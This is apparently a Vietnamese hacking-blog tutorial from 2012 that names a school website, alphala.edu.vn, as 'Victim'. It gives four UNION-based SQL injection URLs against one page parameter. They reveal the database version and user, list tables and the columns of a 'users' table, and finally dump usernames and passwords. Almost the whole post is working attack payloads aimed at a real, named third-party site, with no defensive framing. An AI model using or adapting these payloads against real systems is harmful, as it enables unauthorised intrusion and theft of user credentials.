Trang chủ
»
SQL Injection
» [Tut] SQL injection alphala.edu.vn
21 thg 8, 2012
[Tut] SQL injection alphala.edu.vn
Victim : http://alphala.edu.vnNhững bước đầu anh em làm nhé. Bắt đầu làm từ bước Get version
Get version:
Mã:
http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,concat_ws(0x7c,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Mã:
http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--
Mã:
http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x7573657273--
Mã:
http://alphala.edu.vn/index.php?type=1&show=news&view=32 union select 1,unhex(hex(group_concat(username,0x7c,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from users--
Không có nhận xét nào:
Đăng nhận xét